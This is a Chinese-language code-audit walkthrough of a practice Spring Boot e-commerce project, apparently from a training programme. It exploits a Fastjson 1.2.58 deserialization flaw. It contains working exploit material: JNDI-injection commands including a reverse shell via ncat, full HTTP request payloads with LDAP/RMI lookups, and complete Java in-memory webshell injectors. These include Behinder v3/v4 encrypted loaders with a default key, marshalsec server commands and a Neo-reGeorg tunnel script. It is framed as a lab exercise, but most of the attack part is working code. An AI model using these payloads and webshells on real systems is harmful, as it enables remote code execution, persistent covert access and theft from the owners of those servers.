0x00 环境搭建
介绍
迷你天猫商城是一个基于Spring Boot的综合性B2C电商平台,需求设计主要参考天猫商城的购物流程:
用户从注册开始,到完成登录,浏览商品,加入购物车,进行下单,确认收货,评价等一系列操作。 作
为迷你天猫商城的核心组成部分之一,天猫数据管理后台包含商品管理,订单管理,类别管理,用户管
理和交易额统计等模块,实现了对整个商城的一站式管理和维护。
环境配置
本套练习由炼石计划提供源码
- 下载项目、把
tmalldemodb.sql导入本地数据库 - 修改
application.properties、jdbc.properties
项目地址
本项目Github地址:
https://gitee.com/project_team/Tmall_demo
项目访问地址如下:
前台地址:http://127.0.0.1:8088/tmall
后台地址:http://127.0.0.1:8088/tmall/admin
0x01 组件审计
此项目是基于Maven构建的,从pom.xml中梳理组件如下表:
| 组件名称 | 组件版本 |
| SpringBoot | 2.1.6.RELEASE |
| Fastjson | 1.2.58 |
| Mysql | 5.1.47 |
| Druid | 1.1.19 |
| Taglibs | 1.2.5 |
| Mybatis | 3.5.1 |
| Log4j | 2.10.0 |
Fastjson漏洞代码审计
本项目引入的Fastjson版本为1.2.58,该版本存在反序列化漏洞。
Fastjson简述
Fastjson是Alibaba开发的Java语言编写的高性能JSON库,用于将数据在JSON和Java对象之间相互转换。
两个主要接口是JSON.toJSONString和JSON.parseObject、JSON.parse,分别实现序列化和反序列化操作。
Fastjson反序列化简述
Fastjson反序列化漏洞简单来说是出现在将JSON数据反序列化过程中出现的漏洞。
攻击者可以传入一个恶意构造的JSON内容,程序对其进行反序列化后得到恶意类并执行了恶意类中的恶意函数,进而导致代码执行
漏洞触发点
全局搜索JSON.parse和JSON.parseObject
ProductController.java
/tmall/admin/product
src/main/java/com/xq/tmall/controller/admin/ProductController.java#addProduct
所有产品->添加一件产品->保存
查看版本
{"@type":"java.lang.AutoCloseable"出网验证:
{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}开启autotype功能,-Dfastjson.parser.autoTypeSupport=true
工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
1.打开计算器
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 192.168.100.1 -C "calc"
2.打开文件
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 192.168.100.1 -C "cmd /c C:/Users/HW/Desktop/1.txt"
3.将C:\Windows\System32\drivers\etc\hosts以base64编码格式存入output.txt中(可读权限)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 192.168.100.1 -C "powershell -Command $content = [System.IO.File]::ReadAllText('C:\\Windows\\System32\\drivers\\etc\\hosts'); [System.IO.File]::WriteAllText('C:\\Users\\HW\\Desktop\\output.txt', [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($content)))"
4.将C:\Windows\System32\drivers\etc\hosts以16进制Hex编码格式存入output.txt中(可读权限)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 192.168.100.1 -C "powershell -Command $bytes = [System.IO.File]::ReadAllBytes('C:\\Users\\HW\\Desktop\\1.txt'); [System.IO.File]::WriteAllLines('C:\\Users\\HW\\Desktop\\output.txt', ($bytes | ForEach-Object { $_.ToString('X2') }))"
5.反弹shell
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 192.168.100.1 -C "ncat -e cmd 192.168.100.148 1111"POC:
POC:
Fastjson1.2.5 <= 1.2.59
{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://192.168.100.1:1389/eut5xq"}
{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://192.168.100.1:1389/eut5xq"}
Data POC:
POST /tmall/admin/product HTTP/1.1
Host: 192.168.100.1:8088
Content-Length: 367
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.100.1:8088
Referer: http://192.168.100.1:8088/tmall/admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: username=admin; username=admin; username=admin; JSESSIONID=3B60E76B71E8044CED5B922DAFD4F72E
Connection: close
product_category_id=1&product_isEnabled=0&product_name=111&product_title=1&product_price=1&product_sale_price=1&productSingleImageList=%2Ftmall%2Fres%2Fimages%2Fitem%2FproductSinglePicture%2Fc7de7727-81af-4553-8c69-41db128eaf30.png&productDetailsImageList=1&propertyJson={"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://192.168.100.1:1389/eut5xq"}- 弹出计算器
base64解码文件
16进制Hex解码文件
- 反弹
shell
/tmall/admin/product/{product_id}
src/main/java/com/xq/tmall/controller/admin/ProductController.java#updateProduct
所有产品->详情->保存
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 192.168.100.1 -C "calc"
PUT /tmall/admin/product/422 HTTP/1.1
Host: 192.168.100.1:8088
Content-Length: 256
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.100.1:8088
Referer: http://192.168.100.1:8088/tmall/admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: username=admin; username=admin; username=admin; JSESSIONID=40212E83DAA92CED19C1C21BB55AC885
Connection: close
product_category_id=1&product_isEnabled=0&product_name=1&product_title=1&product_price=1.0&product_sale_price=1.0&propertyAddJson={"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"rmi://192.168.100.1:1099/nkdvpb"}
&propertyUpdateJson=%7B%7D
ForeOrderController.java
/tmall/orderItem
src/main/java/com/xq/tmall/controller/fore/ForeOrderController.java#updateOrderItem
点击结算
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 192.168.100.1 -C "calc"
PUT /tmall/orderItem HTTP/1.1
Host: 192.168.100.1:8088
Content-Length: 111
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.100.1:8088
Referer: http://192.168.100.1:8088/tmall/cart
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: username=admin; JSESSIONID=40212E83DAA92CED19C1C21BB55AC885; addressId=110000; cityAddressId=110100; districtAddressId=110101; order_post=111111; order_receiver=1; order_phone=13131313131; detailsAddress=1
Connection: close
orderItemMap={"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"rmi://192.168.100.1:1099/nkdvpb"}
注入内存马
- 运行下面代码,将编译好的
class文件放到当前目录中
无回显
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.handler.AbstractHandlerMethodMapping;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.nio.charset.Charset;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
public class InjectToController {
// 第一个构造函数
public InjectToController() throws ClassNotFoundException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException, InvocationTargetException {
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
// 1. 从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
// 可选步骤,判断url是否存在
AbstractHandlerMethodMapping abstractHandlerMethodMapping = context.getBean(AbstractHandlerMethodMapping.class);
Method method = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping").getDeclaredMethod("getMappingRegistry");
method.setAccessible(true);
Object mappingRegistry = (Object) method.invoke(abstractHandlerMethodMapping);
Field field = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry").getDeclaredField("urlLookup");
field.setAccessible(true);
Map urlLookup = (Map) field.get(mappingRegistry);
Iterator urlIterator = urlLookup.keySet().iterator();
List<String> urls = new ArrayList();
while (urlIterator.hasNext()) {
String urlPath = (String) urlIterator.next();
if ("/malicious".equals(urlPath)) {
System.out.println("url已存在");
return;
}
}
// 可选步骤,判断url是否存在
// 2. 通过反射获得自定义 controller 中test的 Method 对象
Method method2 = InjectToController.class.getMethod("test");
// 3. 定义访问 controller 的 URL 地址
PatternsRequestCondition url = new PatternsRequestCondition("/magua");
// 4. 定义允许访问 controller 的 HTTP 方法(GET/POST)
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
// 5. 在内存中动态注册 controller
RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
// 创建用于处理请求的对象,加入“aaa”参数是为了触发第二个构造函数避免无限循环
InjectToController injectToController = new InjectToController("aaa");
mappingHandlerMapping.registerMapping(info, injectToController, method2);
}
// 第二个构造函数
public InjectToController(String aaa) {
}
// controller指定的处理方法
public void test() throws IOException {
// 获取request和response对象
HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
/* 无 */
// java.lang.Runtime.getRuntime().exec(request.getParameter("cmd"));
/* 有 */
String code = request.getParameter("code");
if (code != null) {
StringBuilder result = new StringBuilder();
Process process = null;
BufferedReader bufrIn = null;
BufferedReader bufrError = null;
response.setCharacterEncoding("utf-8");
response.setContentType("text/html,charset=utf-8");
PrintWriter writer = response.getWriter();
try {
ProcessBuilder builder = null;
if (System.getProperty("os.name").toLowerCase().contains("win")) {
builder = new ProcessBuilder(new String[]{"cmd.exe", "/c", code});
Process start = builder.start();
bufrIn = new BufferedReader(new InputStreamReader(start.getInputStream(), Charset.forName("GBK")));
bufrError = new BufferedReader(new InputStreamReader(start.getInputStream(), Charset.forName("GBK")));
} else {
builder = new ProcessBuilder(new String[]{"/bin/sh", "-c", code});
Process start = builder.start();
bufrIn = new BufferedReader(new InputStreamReader(start.getInputStream(), Charset.forName("UTF-8")));
bufrError = new BufferedReader(new InputStreamReader(start.getInputStream(), Charset.forName("UTF-8")));
}
String line;
while ((line = bufrIn.readLine()) != null) {
result.append(line).append('n').append("</p >");
}
while ((line = bufrError.readLine()) != null) {
result.append(line).append('n').append("</p >");
}
System.out.println(result);
writer.println(result);
writer.flush();
writer.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}有回显
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;
public class Inject {
public Inject() throws Exception{
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.
currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
// 从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
// 通过反射获得自定义 controller 中唯一的 Method 对象
Method method = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping").getDeclaredMethod("getMappingRegistry");
// 属性被 private 修饰,所以 setAccessible true
method.setAccessible(true);
// 通过反射获得该类的test方法
Method method2 = Inject.class.getMethod("test");
// 定义该controller的path
PatternsRequestCondition url = new PatternsRequestCondition("/memshell");
// 定义允许访问的HTTP方法
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
// 在内存中动态注册 controller
RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
// 创建用于处理请求的对象,避免无限循环使用另一个构造方法
Inject injectToController = new Inject("aaa");
// 将该controller注册到Spring容器
mappingHandlerMapping.registerMapping(info, injectToController, method2);
}
private Inject(String aaa) {
}
public void test() throws IOException {
// 获取request和response对象
HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
//exec
try {
String arg0 = request.getParameter("cmd");
PrintWriter writer = response.getWriter();
if (arg0 != null) {
String o = "";
java.lang.ProcessBuilder p;
if(System.getProperty("os.name").toLowerCase().contains("win")){
p = new java.lang.ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});
}else{
p = new java.lang.ProcessBuilder(new String[]{"/bin/sh", "-c", arg0});
}
java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
o = c.hasNext() ? c.next(): o;
c.close();
writer.write(o);
writer.flush();
writer.close();
}else{
//当请求没有携带指定的参数(code)时,返回 404 错误
response.sendError(404);
}
}catch (Exception e){}
}
}- 使用
marshalsec开一个ldap的服务,并指定/Exploit这个reference对应的路径为http://127.0.0.1:8090/#InjectToController,再用python开一个web文件服务器
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8090/#InjectToController
python3 -m http.server 8090
burp suite发包如下
PUT /tmall/admin/product/439 HTTP/1.1
Host: 192.168.100.1:8088
Content-Length: 258
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.100.1:8088
Referer: http://192.168.100.1:8088/tmall/admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: username=admin; username=admin; username=admin; addressId=110000; cityAddressId=110100; order_post=111111; order_receiver=1; detailsAddress=1; districtAddressId=110101; order_phone=13131313131; JSESSIONID=1BEC45973790E2DF8282066F7517EC67
Connection: close
product_category_id=1&product_isEnabled=0&product_name=111&product_title=1&product_price=1.0&product_sale_price=1.0&propertyAddJson={"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://192.168.100.1:1389/Exploit"}&propertyUpdateJson=%7B%7D- 浏览器访问
http://192.168.100.1:8088/tmall/malicious
- 执行命令
冰蝎内存马-v3.0内置加密模式
- 使用上面
Inject.java的代码模板只需要在test方法里实现冰蝎jsp马的功能就可以
- 直接把
jsp代码复制到test方法中:
- 引入包替换到上面,删除
if判断语句 - 加上
HttpSession session=request.getSession(); pageContext是jsp内置对象,在spring中不存在,构造一个包含session,response、request的Map<String,Object>对象
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
%>
<%
if (request.getMethod().equals("POST")) {
String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
session.putValue("u", k);
Cipher c = Cipher.getInstance("AES");
c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
}
%>
- 修改代码结果如下
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import java.util.*;
import javax.crypto.*;
import javax.crypto.spec.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;
public class MemBehinder {
public MemBehinder() throws Exception {
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.
currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
// 从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
// 通过反射获得自定义 controller 中唯一的 Method 对象
Method method = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping").getDeclaredMethod("getMappingRegistry");
// 属性被 private 修饰,所以 setAccessible true
method.setAccessible(true);
// 通过反射获得该类的test方法
Method method2 = MemBehinder.class.getMethod("test");
// 定义该controller的path
PatternsRequestCondition url = new PatternsRequestCondition("/memshell");
// 定义允许访问的HTTP方法
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
// 在内存中动态注册 controller
RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
// 创建用于处理请求的对象,避免无限循环使用另一个构造方法
MemBehinder injectToController = new MemBehinder("aaa");
// 将该controller注册到Spring容器
mappingHandlerMapping.registerMapping(info, injectToController, method2);
}
private MemBehinder(String aaa) {
}
public void test() throws IOException {
// 获取request和response对象
HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
HttpSession session = request.getSession();
//exec
try {
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
session.putValue("u", k);
Cipher c = Cipher.getInstance("AES");
c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
Map<String, Object> obj = new HashMap<>();
obj.put("session", session);
obj.put("request", request);
obj.put("response", response);
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(obj);
} catch (Exception e) {
}
}
}- 编译好的
MemBehinder.class、MemBehinder$1U.class文件放到当前目录中,开启rmi和web服务,MemBehinder$1U.class在冰蝎点击链接是调用
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://127.0.0.1:809/#MemBehinder" 999
python3 -m http.server 809
burp suite发包如下
PUT /tmall/admin/product/439 HTTP/1.1
Host: 192.168.100.1:8088
Content-Length: 256
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.100.1:8088
Referer: http://192.168.100.1:8088/tmall/admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: username=admin; username=admin; username=admin; addressId=110000; cityAddressId=110100; order_post=111111; order_receiver=1; detailsAddress=1; districtAddressId=110101; order_phone=13131313131; JSESSIONID=455B352A34F385982E1EBCB1B6C0F061
Connection: close
product_category_id=1&product_isEnabled=0&product_name=111&product_title=1&product_price=1.0&product_sale_price=1.0&propertyAddJson={"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"rmi://192.168.100.1:999/Exploit"}&propertyUpdateJson=%7B%7D- 连接成功
- 执行命令
流量分析
- 捕获回环地址
- 搜索
http
- 查看追踪流
- 并进行
Hex解码
- 第二段进行解码时返回了加密数据
- 对加密流量进行解密发现用户执行了
ipconfig命令
- 直接
Hex解码最后一段数据,再解密最后得到的是base64编码后的数据
- 最后选择
base64解码,可以看到冰蝎返回的数据内容
冰蝎内存马-v4.0自定义传输协议加密模式
- 同上面冰蝎
v3.0类似,依旧魔改Inject.java代码,将Decrypt私有算法提取出来
- 删除
out.clear();和out=pageContext.pushBody();,其他地方修改类似
<%@page import="java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
private byte[] Decrypt(byte[] data) throws Exception
{
String k="e45e329feb5d925b";
javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");c.init(2,new javax.crypto.spec.SecretKeySpec(k.getBytes(),"AES"));
byte[] decodebs;
Class baseCls ;
try{
baseCls=Class.forName("java.util.Base64");
Object Decoder=baseCls.getMethod("getDecoder", null).invoke(baseCls, null);
decodebs=(byte[]) Decoder.getClass().getMethod("decode", new Class[]{byte[].class}).invoke(Decoder, new Object[]{data});
}
catch (Throwable e)
{
baseCls = Class.forName("sun.misc.BASE64Decoder");
Object Decoder=baseCls.newInstance();
decodebs=(byte[]) Decoder.getClass().getMethod("decodeBuffer",new Class[]{String.class}).invoke(Decoder, new Object[]{new String(data)});
}
return c.doFinal(decodebs);
}
%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return
super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buf = new byte[512];
int length=request.getInputStream().read(buf);
while (length>0)
{
byte[] data= Arrays.copyOfRange(buf,0,length);
bos.write(data);
length=request.getInputStream().read(buf);
}
/* 取消如下代码的注释,可避免response.getOutputstream报错信息,增加某些深度定制的Java web系统的兼容�??
out.clear();
out=pageContext.pushBody();
*/
out.clear();
out=pageContext.pushBody();
new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);}
%>3. 修改代码结果如下
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import java.io.*;
import java.util.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.IOException;
import java.lang.reflect.Method;
public class MemBehinder4 {
public MemBehinder4() throws Exception {
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.
currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
// 从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
// 通过反射获得自定义 controller 中唯一的 Method 对象
Method method = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping").getDeclaredMethod("getMappingRegistry");
// 属性被 private 修饰,所以 setAccessible true
method.setAccessible(true);
// 通过反射获得该类的test方法
Method method2 = MemBehinder4.class.getMethod("test");
// 定义该controller的path
PatternsRequestCondition url = new PatternsRequestCondition("/memshell");
// 定义允许访问的HTTP方法
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
// 在内存中动态注册 controller
RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
// 创建用于处理请求的对象,避免无限循环使用另一个构造方法
MemBehinder4 injectToController = new MemBehinder4("aaa");
// 将该controller注册到Spring容器
mappingHandlerMapping.registerMapping(info, injectToController, method2);
}
private MemBehinder4(String aaa) {
}
private byte[] Decrypt(byte[] data) throws Exception {
String k = "e45e329feb5d925b";
javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");
c.init(2, new javax.crypto.spec.SecretKeySpec(k.getBytes(), "AES"));
byte[] decodebs;
Class baseCls;
try {
baseCls = Class.forName("java.util.Base64");
Object Decoder = baseCls.getMethod("getDecoder", null).invoke(baseCls, null);
decodebs = (byte[]) Decoder.getClass().getMethod("decode", new Class[]{byte[].class}).invoke(Decoder, new Object[]{data});
} catch (Throwable e) {
baseCls = Class.forName("sun.misc.BASE64Decoder");
Object Decoder = baseCls.newInstance();
decodebs = (byte[]) Decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(Decoder, new Object[]{new String(data)});
}
return c.doFinal(decodebs);
}
public void test() throws IOException {
// 获取request和response对象
HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
HttpSession session = request.getSession();
//exec
try {
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return
super.defineClass(b, 0, b.length);
}
}
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buf = new byte[512];
int length = request.getInputStream().read(buf);
while (length > 0) {
byte[] data = Arrays.copyOfRange(buf, 0, length);
bos.write(data);
length = request.getInputStream().read(buf);
}
Map<String, Object> obj = new HashMap<>();
obj.put("session", session);
obj.put("request", request);
obj.put("response", response);
new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(obj);
} catch (Exception e) {
}
}
}- 成功读取到
xxx.class
- 连接成功
- 执行命令
注入Neo-reGeorg
生成一个带有指定密码的脚本文件
python neoreg.py generate -k password
<%@page pageEncoding="UTF-8"%>
<%!
public static java.util.Map<String,Object> namespace = new java.util.HashMap<String,Object>();
public static byte[] unGzip(byte[] bytes) throws Exception{
java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();
java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes);
java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = ungzip.read(buffer)) >= 0)
out.write(buffer, 0, n);
return out.toByteArray();
}
public static Class loader(byte[] bytes) throws Exception {
java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100,101,102,105,110,101,67,108,97,115,115}), new Class[]{byte[].class, int.class, int.class});
method.setAccessible(true);
Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)});
return clazz;
}
%>
<%
String charslist = "ymvx0PzraRgGsoLkAJ3TjC7EwNO4H/B1b6Mlq9W5+ncfZFiQ8KUpdtXVYDIu2She";
Object[] args = new Object[]{
request, //0
response, //1
charslist.toCharArray(), //2
new byte[]{-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,40,-1,-1,-1,29,4,31,60,18,27,39,33,22,48,37,-1,-1,-1,-1,-1,-1,-1,16,30,21,57,23,45,11,28,58,17,49,14,34,25,26,5,47,9,61,19,50,55,38,54,56,44,-1,-1,-1,-1,-1,-1,8,32,42,52,63,43,10,62,46,20,15,35,1,41,13,51,36,7,12,53,59,2,24,3,0,6,-1,-1,-1,-1,-1},//3
new Integer(200),//4
new Integer(513),//5
new Integer(524288),//6
"kv0FG3mxOl9jNCNn4E9TOr6RN79wwjSTBCmaNxyKJlJ5HXnVJlmNojNNCl/UsXYtBECEOjPxLP98Tdtt7W0fs5ntN3SaHCoVJqNJor9COqRUBlmGoT/nJV6zgdDiHrCoavdFkb==",//7
new Integer(274876949),//8
new Integer(0),//9
new Integer(0),//10
new Integer(0),//11
};
if(namespace.get(charslist) == null){
